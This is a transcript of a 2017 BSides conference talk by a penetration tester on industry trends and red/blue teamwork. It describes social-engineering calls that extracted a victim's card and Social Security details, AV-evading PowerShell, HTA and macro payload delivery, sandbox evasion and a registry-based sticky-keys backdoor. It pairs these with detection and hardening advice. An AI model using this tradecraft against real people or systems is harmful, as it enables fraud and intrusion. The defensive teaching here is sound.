BSidesSLC 2017 -- Dave Kennedy -- A Continually Changing Industry: INFOSEC

[Music] this talk today is really around uh what we're seeing as far as the industry and a lot of us are in a lot of different roles and there's so many different things that happen um in our industry we have everybody from you know uh malare reversers to exploit researchers to pent testers and red teamers to blue team folks to people that are in compliance and audit so we have so many different uh breeds of people here today with so many different experiences um and we'll talk and I'll try to hit on a lot of those those different areas on security and what we're seeing um as far as a continu continuously changing industry I

think Sean did a great introduction myself I don't need to go in anymore um but uh you know I was a marine uh and I was stationed in Hawaii uh for 5 years it was a really hard Duty station um you know a lot of sun and and beaches and things like that U but I did did did two tours in Iraq um I did a of signals intelligence so when you saw the Saddam statue fall um I was already inside of um Iraq doing signals collection and a bunch of other stuff um but I got out and uh I was in a small Consulting shop for a little bit and then I became a

chief security officer for uh Fortune 1000 company um and it was interesting because uh being a in going into an organization that was like you know suits and ties and I was like I think at the time I was like 26 I was one of their youngest uh I guess VPS in history or whatever um it's interesting having to work with a bunch of people and and try to build a security program and that's where I started to learn a lot of the uh the stuff around um actually building stuff in Enterprises but I do work on Mr Robot too um if you saw episode one season five I think it was uh where they're hacking into uh steel

Mountain um and then Elliott is about to get caught because he's trying to social engineer his way into I think it was like level five uh they used the social engineer toolkit to spoof a text message and then uh you know uh say that your husband is in the hospital and so then got Elliot to level 5 and then season 2 episode 1 um they did uh they deployed ransomware to evil Corp uh I think it was was Darlene deployed Ransom word evil Corp and so I helped a little bit with that to they Ed the social engineer toolkit um but it's been fun you know it's kind of cool working with uh different uh things like that and kind

of trying to portray accurate representations of of hackers um in the news I'm also considered one of the world's sexiest men alive um it's not photoshopped actually it's not Photoshopped it wasn't for me though but uh when I was on the Katy Kirk show a couple years ago I was a little bit heavier then that's Big Dave and I'm Little Dave um but Big Dave uh was talking on Katy Kirk and I hacked somebody live in the audience or whatever and Benedict cumberpatch who is the guy that plays like Sherlock and uh um you know a lot of the other um movies and everything um he was coming up next and it said up next one of the world

sexiest men Al lie but they removed the up next for like a couple seconds and I happened to be on the TV show and of course you know all my buddies found out and made it go viral so um I'm sticking with it I don't think goes an accident just going to keep keep going on with that and uh go from there it's amazing though like that's actually a white shirt and they changed the Hue contrast to make it look like I was wearing a pink shirt because it tailored towards the demographics of the audience so it's amazing how they do all that stuff but I was not wearing a pink shirt by the way

it's actually a blue tie anyways so we talk about today and why we're here today you know it seems like um when you look at what's happening in the industry today um things are evolving in all aspects um and that's a good thing uh we see technology advancing at a rapid rate uh technology integration into businesses to where you know we have to have the latest tech we have the Internet of Things where we have you know devices all over our infrastructure Network and now with the CIA leaks now they're hacking in the smart TVs and everything else that's out there so you see a lot of stuff happening out there and then you see a

lot of security products coming out touting that they can fix everything around that right you know hey we can fix today's problems with you know this specific piece of software and it's going to stop everything um and when you look at at how technolog is moving at such a fast fast pace it's really difficult for us in the security industry to get a hold of that I think if you look at most corporations you know if you have an organization of 10,000 people we would be in a perfect Ro when it comes to security if we had 10,000 people dedicated to security you could literally sit behind somebody you be like nope don't click that that's bad

you know that would be wonderful right we'd have an awesome you know life where you know compromises probably didn't happen um but unfortunately we don't have um that capacity to be able to work with people on a day-to-day basis to introduce new technology and and secure it and so you look at environments and you have a a choice in a lot of organizations between complexity and simplicity and when I say that is a lot of the the uh the things that we're doing today introduce complexity introducing Sims and introducing Next Generation firewalls a good example with Next Generation firewalls um usually a a company has you know let's just say 10 you know Network Engineers that are

specifically focused on Cisco right and Cisco has been what they know for the rest of their lives and they they've known Cisco for 10 years and you have this whole infrastructure set up and you want to get to the Next Generation line so you want to go with Palo alos so you're like well hey we're going to get next gen we're going go with Palo alos and now you get this Palo here and you have all these 10 years of of historical non-segmentation and bad security practices and then you just use the the Importer tool from Cisco to paloalto and all of a sudden you're supposed to be NextGen right now your engineers that are sancisco Engineers have no idea what

they're doing with the new Palo alos and now you have the same rules that you had before but then you have a whole bunch of complexity on top of it now you're hopefully getting better at detecting attack somehow and so complexity isn't always a great thing in environments when we see what's happening now the good news is we have

compan um stops the hackers uh artificial intelligence that prevents Hackers from breaking into your infrastructure right 99.9% um goodbye data breaches from Barracuda um you know conceptual things that that make absolutely no sense whatsoever and are complete marketing fund but yet you know executive SE this and say hey why aren't we there yet why aren't we stopping 99.9% of the breaches and I want you to go with this product because it stops all of that and so you have technology that's touting artificial intelligence and machine learning and and I I honestly think um in the future it will be something that is absolutely uh applicable but in most cases it's it's just a lot of marketing

millions and millions of dollars thrown at marketing and for us as attackers it's extremely easy for us to circumvent and get around so to me what actually works and what I see working is looking at organizations in a different way I don't care about the technology per se I don't care what you have in your environment but my whole purpose in life insecurity is to minimize the noise and what I mean by noise is there's certain things that in your environment that you can stop today right now with a little bit of hard work and elbow grease you can stop you can stop a lot of the noise that you'd see today if you look at

infection rates was it 92% of all infections still come from executables executables 92% that was like back in the AOL days and like the pagy where you're pulling malware to someone's machine and you had sub seven and all that good stuff right we're still fighting with that today and so if you look at most of the infection rates you can eliminate 92% of the Noise by just baselining what you have in your environment not allowing non-code sign certific uh executables um you know only doing certain exceptions based off of your environment things that actually work in environments to reduce your level of effort and then focusing on the 8% that you really need to focus on in your environment so

reducing the scope of what you have to do on your attack surface and so I'll talk a little about that um and what that means but how do you really focus on what matters and so if you look at focusing on what matters and I think the uh the new name and and what you're going to be doing next year uh with this conference you know the the concept around red and blue making that purple piece is is a concept that I truly believe in in this industry you know a lot of us that are on the defense we sit there all day you know trying to respond to incidents and on top of that we have

meetings upon meetings upon meetings upon meetings but yet somehow we're supposed to get that one flaw in all of our data that happens to be in our Sim that leads to a breach that we can detect early on so we can minimize the damage to our Corporation and so we're in a very interesting dilemma because we have blue team which has a lot of different components um that are part of the day-to-day and don't necessarily understand a lot of the offensive side of of how we're actively attacking same thing for red when I go in and I attack specific organizations I learn new ways of Defending that I've never seen before and so we'll talk a little about that

and what that means so if you look at everything um embedded um we look at what we're dealing with on a day-to-day basis we have to understand each other we have to understand the red side we have to understand the blue side in order to come together to figure out a better approach to understanding what's going on there in attack side you look at all these products that are out there today they're not built from an attacker's mindset they're built like a good example um is uh edrs they made familiar with edrs m point detection and response it's the new buzz word it's a whole market now that's kind of booming up there so you have EDR R and edrs are

supposed to give you better visibility into your environment that's great I think they're great tools for collecting information very much so like what a Sim could do but do you know what to look for in your environment what those indicators of compromises look like what those attack patterns look like because you don't have an entire team dedicated to Red you're you're going to miss a significant amount of things a good example is like um like subt stuff that he did with regsvr32 for application what listing bypasses do you know to look for STS in your environment that are downloading and beaconing out to the internet some may that's great some may not you know and there's different

indicators to look for in your environment that that really um and those those tools can help you with you don't have that institutionality unless you build it internally and so we have to switch our tactics um around how we handle and you probably heard the term hunt teaming coming out right um the term hunt teaming where you actively go out and look for indicators of compromises in your environments looking for uh abnormal behaviors aside from what you would traditionally see in your your your regular monitoring detection programs in your Sims that's a great concept so what we see often times is what red does looks like magic most of the time it's pretty simplistic stuff it's not heavily

sophisticated attacks um and I'll show you a few of these here in just a minute um but in a lot of cases these attacks take advantage of individuals I.E fishing or whatnot direct exploitation is much more difficult um when I Target individuals I usually don't even use browser exploits anymore um and the reason for that is you know if I'm if I'm targeting an organization most organizations aren't consistent across the board someone might be using IE as a browser um it maybe Edge as another browser maybe Chrome is another does everybody have the same versions of browsers that everybody supports across your entire environment does everybody have the same version of doe across their entire environment maybe if you do

decent patch management so we have a lot of different components in our environments that change how I I attack an organization and so if it order for me to exploit somebody I need to know the exact operating system the version that they're running and the specific exploits that I'm going to Target them from that's a lot of work but instead if I don't want to run exploits I can just take advantage of how Windows is designed to work how applications are designed to work and just them open and download something and execute it macros are still great uh direct data types are still great um HTA files I still don't know why nobody is blocking HTA

extensions from their their um outbound internet for what you can download on the on the web go to your web content filtering stuff now and block. HDA files it's literally like full code execution like Java applets are and all you have to do is Click open it's pretty ridiculous yet no one blocks it and that's what's being actively used for those click buys now um with like the Adobe Chrome updaters like hey your Chrome extension is is out of you need to update it you go to that site and you click open and it does Powershell injection compromises your machine um usually establishes a keystroke logger and steals credentials so you know there's a lot of things that are out

there from the hacker side that may seem like magic so I'm going to play a video that I did on on CNN I like this one if you've seen it I apologize but um you know this one on CNN was pretty funny because it shows how easy it is um to get into an organization and a lot of times what I do when I'm when I'm social engineering I'm going after a specific Target I usually do my research um on the individual Target targeting salespeople are the best um by far like you can be like hey I'm going to give you a million dollars I need you to click on this malare ID exe so that you

can get your proposal signed okay you know it's no problem right you can do whatever you need to with salespeople um help desk is also great um marketing is great as well but help desk are great because what's help Des function the help right they're there to help you now as pentesters when we try to simulate real world activities what do we do we try to like reset passwords and stuff like that right well if you try to reset somebody's password you need to know a lot of information about that that person that you're targeting um you know dat of birth probably Social Security numbers or employee ID things like that that they will use to to help

you reset but if you just take advantage of a help desk function to help and you don't require any sensitive anything had to be abnormal that would trigger something in their brain to say hey this is weird you're probably okay and they they're probably going to help you and guess what what do they typically have elevated rights in their environment right so you probably have administrative over rights over at least the end points themselves and I can go from Bob and I in in help Des to Jane it that has access to server environments and I can start attacking different systems so targeting functions um based off of specific areas in organizations is 100% applicable and a lot of times

I'll do like like if I'm going after salese I'll actually set up a fake um you know like like um business that's in their industry vertical if they're B2B or you know B Toc I'll set up a certain like site that's in their industry vertical that they would go for like I need to spend like $2 million by next week can you help me out like literally like as soon as you hit the send button you're getting a response back and they're calling you on the phone and they're trying to go to your door and knocking your door right so you can at that point in time you have whatever you want to you can get them to do whatever

you want to so this is when I did in

CNN e

this is you know um and and if if you Google certain companies they'll do like press releases or the credit card company we do press releases especially if they're large so I can tell that they use a certain credit card brand um and so I was like hey this is so and so fraud services I spoofed the 888 number um I'm like hey are you currently traveling internationally right now I see a lot of uh transactions in Paris and I'll just call him Bob his name is not Bob but I'll just say Bob but I was like uh yeah yeah I'm in Paris right now I'm sorry I didn't I forgot to call ahead of time to let you know I was

going to Paris everything's fine I'm in Paris I'll be here I'm like okay well how long are you going to be there for um you know when are you going to U be departing so we can go through um and Mark that in your account and he's like I'll be here till Friday you know thank you so much you folks are always great with it I'm like yeah I just need to go over a couple quick transactions just to make sure they're okay I can tell Bob's in a a really crowded area right you know and it can tell he's starting to get annoyed with me because at this point in time like he's already you know

said what he needed to say and you know he already confirmed it but now I have to do an additional step this is a bad position to being in Social Engineering because he's annoyed and I have a small window of time now to actually calm this person into what I want to do and so what I want I needed to do is I needed to move him off center what we call moving off center so that I put him in a defensive mode where he needs me in order to fix a situation so I started um naming off some really horrible places like underground dungeon stuff um for for credit card transactions right um horrible websit

um you know things that that you never want to have on your corporate card ever in the history of corporate cards um and so Bob starts to freak out and he's like no no no those aren't I mean I'm like well you just weren't in Frankfurt you know a week ago at this place here you know it's a known uh blah blah blah and they're like he's like no no this is not me my credit card has been compromised what can we do I'm like okay don't worry you're going to be in Paris right I'm like he's like yes yes you can hear you now he's panicking a little bit and I can do whatever I want to at this point

right I like hey you know I need you to buy me some stuff off of Amazon like okay was that going to help it but um I was like Bob what I need you to do is I need you to give me your full credit card number for security purposes just so I can verify who you are reads office full you know credit card number like the CVV the you know the number and I'm like running it down all CER giggling and everything you know laughing um and uh then I started like asking him for a social security number which I already had but I just for for purposes gives me his full social I'm like give me date of

birth I'm like what's your wife's last for of her social what's your kids last for and at that point he you know he's like what what do you need my kids I'm like anyways so it was a good it it was a a good success based off of uh that one so company's Pam to find out if employees are leaving the company vulnerable he and his

team e

um because you know obviously very quick to to go and taking advantage of health desk I mean you could do anything though like um uh so um the public relations folks um on people's uh uh websites you can Target them individually because they always respond to like media inquiries so you can just pretend to be a media um inquiry and then you can establish you know and have them open up an Excel document you compromise their computer and then whatever so there's many ways of going after um individual uh people now the issue with that is the hardest component of any security program at least to me is is not just our attack surface of what we have out

there but our ability to detect an attack if you don't detect that initial intrusion that initial point in time where somebody clicked the link something someone hit open the help desk clicked open at that point in time you're pretty much going blind to other techniques things like lateral movement um you know starts to become much more difficult persistence hooks command and control infrastructure all of those things start to become much more difficult um if you don't detect that initial intrusion I'll talk a little about that here in just a second you look at the weakest gaps in security that we have today you know the the initial reconnaissance phase of actively going after an organization like hey uh

doing some who is information looking at the the company itself um the sites that they have um looking at you know hey do I need to build or buy an xboy kit or something like that maybe do some preliminary testing for detection and fishing LinkedIn by the way a fantastic resource um uh for for um attackers because a lot of times people put all of their um history on there like hey we just implemented arcite a week ago and now I know you have like no modern detection capabilities whatsoever in your environment because AR takes like 16 years to implement right you know so you know I know you have like nothing in your environment that's going to detect

me or hey we have semantic endpoint protection and we did it a year and a half ago great hey I need to get R semantic right so LinkedIn provides a lot of email as well another good uh thing to try too is most companies will do uh content filtering based off of categorization of sites um so categories for example like a lot of people will block uncategorized sites U freshly new registered domains um you can go to like GoDaddy or whatever and look at previously expired sites and you can look them up in the categorizations you can see like hey this has been categorized in you know retail and Commercial this has been categorized you

just go by the domain point it to your fishing site and use it as your fishing site it's fantastic so just look for expired domains and it gets rid of all your categorizations um you ever need um so there's some good stuff there so if I set my infrastructure up to get around your defenses you know the the hardest and the weakest places that we have currently today is that initial intrusion if I don't detect how the attacker establishes access to my infrastructure that's a problem um if you're using things like application white listing a lot of them are moving more towards um more in memory type attacks like Powershell injection um other methods that that rely

specifically off of that but if I don't the initial intrusion attacker typically establishes a command and control so I can operate that machine and then move to different systems so that's what we call letter movement uh using information off of one machine Let's just say it's the local hashes or curos tokens or things in memory um or spns as a method for for um extraction and cracking we'll take those credentials and we move from one system to the next system to the next system until we get access to somebody that has access to the servers and then they have access to the servers we need access to this database that has all the intellectual property in it so the lateral movement

component of it if you can't flag on that that's also another problem in a weak area of detection uh persistence hooks are some of the easiest to detect depending on how it's done but a lot of times it becomes very difficult so here's a story time um of of some Powershell stuff now uh one of our our customers was using uh carbon black and and I like carbon black I think it's actually a pretty decent uh uh tool it's like sending an ion Canon throughout your network um you know of every single piece of packet data I've never seen actually anybody implemented fully across their environment but it's a good tool for information um and and I think

you know leveraging if you can support it um it does a good job at actually um being able to query a lot of data and to figure out what's going on if you know what you're doing but we were working with a customer on a purple team exercise and so we have you know two folks in the red two folks in the blue and uh they had done a really good job on Powershell detection especially when it comes around things like invoke expression um encoded commands if you don't know this by the way there's 12 different variations of encoded command um hopefully you knew that so you know you don't have to do you know Dash

encoded command to get around execution restriction policies you can do- e abbreviated - EC which most people don't know about um- EC is the super abbreviated version that most people don't even uh trigger a flag for you can do d-c dco so you can do 12 different variations um of enota command this customer had a really good um set of detection criteria around those 12 specific areas of of encoded command so when we do these um types of Assessments we try to figure out ways around their detection to get better and so I just recently released a new version of of unicorn um and the soci engineer toolkit but I actually just released a new

version of unicorn yesterday as I was on the plane flying here um and that does a lot more ausc um against these types of attacks so I heavily recommend I'll show you an example

here there we go Windows is actually running that's a good

thing I will get it right there we go all right so if you're not familiar with

you have to keep it kind of on one one command line and uh one of my favorite folks in the security industry uh Matthew Graber came out with the technique of Le leveraging Powershell to load Shell Code directly into memory now why that's important is most attacks rely off of dropping to dis right so hey I have to write an executable or a file of some sort and execute that on the machine and then from there compromise it well Powershell native injection what you can do is you can take Shell Code uh machine code directly shove it into memory and execute and never touch disc so it's very evasive when it comes to um the types of detection you have now um

with Matthew's attack I expanded on it a little bit and I did what was called an x86 downgrade attack so if you're running in a 32-bit or 64-bit platform I want to have one set of Shell Code that I can fit on one command line to execute on the system itself and so what it does is it detects if it's in a 64-bit operating system or 32-bit and if it's in a 64-bit it'll downgrade that process to a 32bit process and then execute the Shell Code natively with 32-bit Shell Code um why that's important though is you know there was a time there where unicorn was getting picked up by by things like antivirus and stuff like

that right that's no longer an issue anymore whatsoever uh trust me um so it employs heavy acusation now um into the new version um and it doesn't uh get picked up by anything currently so it's kind of a cool thing so let's go

soon as they had open it compromises their computer um you can do uh the macro injection so the macro injection is really good um if people still leverage macros um it's heavily off skated doesn't get picked up by anything um out there currently that I know of um and so as soon as they open up the macro it's says hey you know um Windows U this file is corrupt please download a newer version of Windows and it exits you know the machine but then compromises them with power shell injection without touching dis so there's quite a few different methods um that's built into um unicorn a lot of those techniques are also employed into the social engineer

toolkit as well um but with the new version if you go and run it but you can get it from github.com trustedsec so github.com trust unicorns underneath there um I'll just use Windows meterpreter actually I need to get my IP address first

and then let's give give it my IP address and my local host and then I'll do 443 and it'll go and generate the payload for you it'll generate two um pieces of it the the first will be um the power show code and the second one will be the metpo listener um so you just have to do msf console dasr and then um open up that RC file but this is essentially what the attack will look like uh so it's an uh let me see if I can blow this up a little bit actually I'll just Nano it so you can see it there or VI whatever you prefer so we can see here it starts to

run a Powershell command now it's it's offy skated the variable names are offc never actually calls encoded command and any way shape or form um or- e or- EC or anything like that so it's going to get around traditional detection um the way that I would look at detecting this is the length of the Powershell command itself um and Powershell itself calling out to an external um you know IP address those are two behaviors that you can look for um for this specific one you can see as soon as you run this um it's Opus skated the only thing that you can also trigger on too is uh value two string that's also not typically um used

very often but then it'll go ahead and execute the encoded command which is a base 64 encoded string with all of our metas Spit Show code in it as soon as it's run it'll compromise the machine and then give you access uh to that computer so let's try a little bit of a different attack and I'll actually show you a live one here um I'll I'll go ahead and launch unicorn again but I'm instead of doing blank there I'm to type in HTA at the end of it and this will generate everything that I need to launch a HTA based attack um against an organization with everything there now the new version I just released

yesterday if you go to HDA tax folder and edit the launcher um one of the things that that AV was flagging on when it gets executed was wscript.exe

modified um and it also you know they happen to be flagging on command adexe I split that up to it randomizes that um and then if it you know I I try to randomize as much as possible to get around um anything that's that's out there being kind of stupid with it signature based stuff is absolutely ridiculous um and so and it was actually a funny story uh Microsoft security centrals uh was flagging on um so if you did Powershell DC and you had a power shell command that was long it would trigger that in in Microsoft Security Essentials but if you did - en it was fine it wouldn't trigger on anything that was out there

it's ridiculous and we're seriously still at this point in security anyways so I'll just copy this and I'll launch my uh the uh window here

I'm just going to create a listener real quick once that's good we'll go over to our Windows

machine come on wake up let's use inter explor you can use Edge you can use whatever you want to

website pops open um it'll actually have a prompt to open now that's the part where whether or not it's successful or not you know does the user actually click that open button you can build those into your emails by the way like hey as part of an employee verification process you have to click open for us to verify your computer is on the domain or whatever right you can you can make up any excuse you want to for people to click on it um but we have a high high high success rate at this um usually if we we build our pretext right it's usually around 92 to 94% and usually the reason why we don't get like 100% is

because people are on vacation um so it just depends so as soon as you get this you get this click to open it executes

you know uh most of the the newer Next Generation Um uh edrs and products that are out there they don't typically flag on heavy po shell attacks especially offy skated and embedded things like macros and stuff like that so usually can go pretty pretty easy against that PE start to get a little bit or executables tend to get a little bit um harder in a lot of cases um but that's just a good example now you do the same thing uh for

Excel my command again that's another one that's fine and I think you just do macro back down directory you do macro um this will generate all the macro code that you need that's already offis skated for you to uh and it gives you the instructions on how you actually put the macro in the Excel document um so if you just want to do you just open this up there's your Opus and notice notice here I split up power shell so if you're looking at poers Shell inside of there but holes right in signatures for that uhhuh what's that

yeah I haven't seen Auto open being detected but I know that for uh Microsoft Word versus Excel it's autore open or Auto open one word so you have to change that based off of if you're doing um word or Excel so um if you're using I think it's uh if you're using word you have to do just straight sub Auto open and that will work uh usually I haven't seen anything actually triggering on auto open itself what what what sometimes will happen is is like some of the sandboxing technology like wild fire fire eye um what it'll do those macros is put in the virtual machine and see if it's actually calling out to the internet in some cases like

that you can get snagged for sure um usually putting like time based delays in there or um my favorite technique to get around that is there's VB code out there I think I wrote a blog post on it um that you can do um detection of CPU cores and if CPU cores are less than two then don't run and so what'll happen is it profiles wildfire and fire eyes sandboxes which are predictable sandbox containers and it won't actually execute or or move and you can just get past that and it actually delivers to the endpoint user himself so there's a few ways around it depending on how you want to build it um but you know the VB code

what's great about VB code versus the power shell command is that you can make your Macros as long as you want to and as complex as you you want to versus the Powershell command itself has to be super condensed um on the command line so just some good good tips there I haven't seen anything flagging on auto open specifically and and honestly though too I will also say that I typically don't use macros as much I will most likely use um web attack vectors because it's easier for people to click links um people always click links all the time so like if you build your pretext good enough you don't have to worry about going through all that

sandbox stuff and in their perimeter defenses people just click the link and you have a decent enough rep reputation um doesn't typically uh find it good

question soon as this comes back up okay um so attack Vector detection on this one one HTA files block them just block them from the internet please just block. HDA file so you can make a we have like eight different other techniques that we like to use but HDA files are still so highly successful so our Java appet by the way still I don't know why um Java app still work um but you know block those if you can from the outside Whit list them if you have to absolutely um looking for inside the HDA file if you see certain things um length of the HDA files um I I haven't seen an actual application that leverages hdas

anymore I think there's some like Xerox for old print stuff but that's all local internal things that don't need to go on the internet so you can typically block this um Additionally you can block the extension type through software restriction policies within Microsoft or um if you're um Windows 10 or above you can do device guard um block HDA extensions or anything that that has those in there from actually running on your endpoints themselves so you can stop a lot of that next teching Microsoft's Advanced threat protection anybody saw the blogs in this one it wasn't a very or the the Twitter war that went on between Microsoft and I it wasn't so good but uh um I won't go

into that it's fine it's all over with we're all happy again so um long story short Microsoft has their um Office 365 offering that they just came out with last year called Advanced rep protection ATP um they also have what's called ATA advanced threed in a Linux um so if you're an Office 365 customer if you're an E5 um customer you can also purchase it when you're E3 you have to contact your sales for it but if you're an E5 user within um Office 365 you can get Advanced rep protection and it has two components um one is called safe links the other one is called um uh um uh mail flow or something like that

or mail Advanced mail protection sorry what safelinks does which I'm totally against by the way just like 100% 90 million times against is what do we tell our users to do when we have an email that comes in with a link on it hover over the link don't well first of all don't click it right but second hover over link to make sure it's legitimate right so what Microsoft does is they rewrite the URL to go through their own site first which is called safe links and so when you hover over the link it just shows safe links and so you click the link and it does safe stuff to check to see if it's legit or

not which literally is only a comparison to Black List like I was running like IE exploits and everything like like straight up from like 2014 and was getting through uh no problem with it um you know basically just rewrites URL to see if it's in a known Blacklist and then goes from there so things I'd recommend is kind of um staying away from from that that their male flow piece which is also interesting we just lose there it goes it's a glitch oh hang on second that's not me um I can do hand gestures it's fine uh but when it comes to when it comes to the um the the actual detection around um uh uh like

attachments like macros there's a 15minute delay when you can actually receive your attachment so if you're an Enterprise and you have advanced threat protection put on place you have to wait 15 minutes before you can actually open an attachment which to me is like huge major business hindrance I don't think many people would get that but getting around that also pretty easy so here is um an example and I'm going to turn my sound off cuz I think think I have Bruce Hornsby if you can turn the sound off on the computer I think it's Bruce Hornsby there we go cool you can turn it off it's I turn it off sound yeah off yeah you don't need to

play the music or you can play the music I just have to talk over there we go cool all right so here's a an E5 account with Office 365 um and you can see here on the left hand side um I

have e

um so we look at those examples and you know technology can assist in what we do but it's not going to stop what we do as humans we are we are crafty little creatures um and what we actually um focus on and maybe someday we have artificial intelligence that replaces it and I always thought it would be kind of cool if like like malare writers turned into like artificial intelligence malare writers and like they had artificial intelligence battling other artificial intelligence and like it was like this big massive maare war I mean like it's going to happen it's going to be so sweet I don't know if it's going to happen my lifetime but I want to like

write the first AI maare that just destroys everything else right I mean I just not not not really but you know like show it be sweet so having an understanding of of offense both offense and defense makes Enterprises much more secure if you look at those examples those are specific types of attack patterns that we leverage as attackers that you can block right now with the existing technology you have right now in your environments that can literally prohibit a lot of that from happening right htas by the way are like the new hotness well it's like old hotness there's actually a book from like 1998 that has like it's like this old rainbow book like like

traditional hacker book and it's like a 900 page hacker book I don't remember the name of it but it's like hey you can get code execution within HDA that was in 1998 still work fantastic ftic today it's great so how do we eliminate the noise um and focus on what matters I am a huge huge huge advocate of application wh listing known good so was Matthew Graber uh Matthew Graber is a now works at Microsoft uh he went from uh the ADP team from uh um Varys um and went over to uh Microsoft one of my one of my favorite people I have a huge man crush on on Matthew Graber um and him and I

very much believe that if you take the effort of actually putting in application wh listing in your environment your environment is going to be a much better place to Baseline and from there build detection off of you know if we can minimize our attack surface to application wh listing and then from there look at detection let's just say it's at 8% of people trying to bypass application wh listing isn't that much easier to manage than 100% or that your virus scanners AR aren't going to pick up on or whatever we're trying to do it's painful because you have to sit there and you have to say hey we have to have good configuration management hey

we're probably going to break a bunch of stuff when we implement this yes we need to do this on servers yes we need to do this on servers and yes we need to do this on endpoints get a known good Baseline and then from there look for deviations it works it makes it much more difficult for me as an attacker to move to different systems to compromise other things if you have application white listing in place so you Baseline known good and detect on the rest hey now that we know what's normal in our environment now what what can we start to do to look for data in our environment that is abnormal now we

start getting into the cool hunt teaming things and the purple team exercises things that actually work in environments for building those detection capabilities easy steps we're not even there right now in this industry to do the cool stuff yet the bypass techniques the methods for for attack and exploitation that we would hopefully detect in our environments because we're not even doing known good right now because it's too much work it could impact the business um so do the cool or do the do the hard stuff first do the little elbow grease that's can impact your business for a little bit you know obviously it's a whole political battle you have to go through the whole operations for those that have

already done it successfully congratulations not a lot of folks are still doing application wh listing which I don't understand and then you can start focusing on some cool stuff some cool stuff lateral movement hindering lateral movement there's so many ways of hindering lateral movement if you look at um event IDs uh within just your event logs are you pulling event logs from your endpoints it's a good resource by the way um you can detect things like silver tickets and curos and personz um mimic cats injection especially if Advanced logging sysmon does anybody here have cismon deployed to their environments no Symon's a free tool from Microsoft that gives you Advanced logging into memory and what's actually

happening so things like mimic cats and process injection those are all detectable based on just installing system in your environment it's a Microsoft product like it's free you can just like deployed through SCM to rest of your environment you're good to go getting those logs is imperative for things like lateral movement lateral movement if you don't know we use lower protocols like RPC SMB um power power sh remoting in some cases those have specific key lengths when you're actually authenticating to other systems you can uh uh rip out RDP traffic and look just for specific lower level authentication for remote systems and look for lateral movement in your environment pretty easily with 4624 login events um so those are a lot of

early warning detections having purple teams and Hunt teams understanding suspicious processes like hey why is notepad beaconing out to the internet easy stuff right things that are are legit why is run d32 beaconing out to the internet why is regsvr32 downloading an SAT file and beaconing out to the internet those are behaviors and patterns that you can look for child processes that are spawn uh from from Excel hey command. exe is being spawned from excel.exe probably not legit those are all patterns and behavior that you can easily look for in your environments if you have the right logging in place I'm a huge advocate of what we call deception or honey tokens um there's a lot of deception techniques

you can do like lmnr and mbns uh fake honey tokens across your network so if someone's running responder or envey on your network um you know uh looking for that there's a specific login event I think it's 4648 so with responder you can actually detect responder noes in your environment what happens is responder sends out LMR multicast so it sends it out to your environment what an attacker does it says yep I'm that server connect to me and it passes it net ntlmv2 or net nmv one depending on your environment to that attacker that attacker can then crack that that password offline it's like basically getting free credentials in your network as pent testers we consider that

cheating it's like the easiest way of getting domain am in in environments ever it's like literally turn around like magic credentials start flying through um what you can do is you can actually send out honey token or honey broadcast across your network it's just a Powershell script that sends and looks for things and you just put a fake username and password in there that's not a a regular username or password in your environment and if you ever see the event ID explicit login credentials were used to log into the remote system it's a good indication that someone's sitting there listening to your environment of what's actually happening a honey tokens another great one you can put

credentials into memory um that look like domain admins with a fake password

ibly through event log 4624 login type um and then the specific key length um if you could just look for um detecting past the hash uh and then look for binary defense you'll see a whole write up on how to incorporate that into your sim environment to detect fast the hash in your environment really easy to do suspicious processes here's just a couple there's a whole bunch of them but like tracker run de32 Ms build um You can call Ms build and have it pull from a remote file share um have it executed on your machine regr 32 is probably one of my favorites um CBD um there's quite a few of them out there that give you uh

uh code execution you remember sticky keys the sticky keys trick right well you don't need to reboot anymore by the way um so with sticky keys you you have to reboot and you take command idx and rename it to like or set HD idx to command ID exe and then when the machine rebooted you could hit the the shift key five times and a command prompt would pop up without having to log in and run you a system rights but if you have access to the registry you can just a debug flag um and you don't have to reboot or anything under any process that you want to or any protected Windows process you need and then it replaces that every

time you use it so you can actually just use that registry key and then hit the shift key next time and you have backd door persistence uh into environments um so I'd look for that registry key because it's being actively used right now and so closing up here I talked about a lot okay but what it comes down to is hard work we have to actually do hard work in order to have desirable results application whitelisting known good is hard work getting to behavioral detection and weird things in environments is hard work sifting through the massive amount of logs that we deal with on a regular basis is hard work protecting our attack surface is

insane right but it's doable minimizing our attack surface is doable we just have to do hard work in our environments to go and do it so known good as hard work it's work that that is worth it to me it's work that I see that stops me as an attacker and it's work that has results the thing about this is I'm excited because I think the industry itself is moving towards some really good things uh I think that we're moving to a place where we're maturing as a as an organization adopting a lot of things and I'm really excited that we have so many people here such as bide Salt Lake City and throughout this industry of

talented folks that are coming with awesome research techniques new ways of getting around things new ways of Defending I think uh will be okay in the long run never going to secure uh never going to solve security period but I think when we put all of over put our minds to it um we'll be a better in a better place thank you very much for having me appreciate it and hopefully you learned something new thanks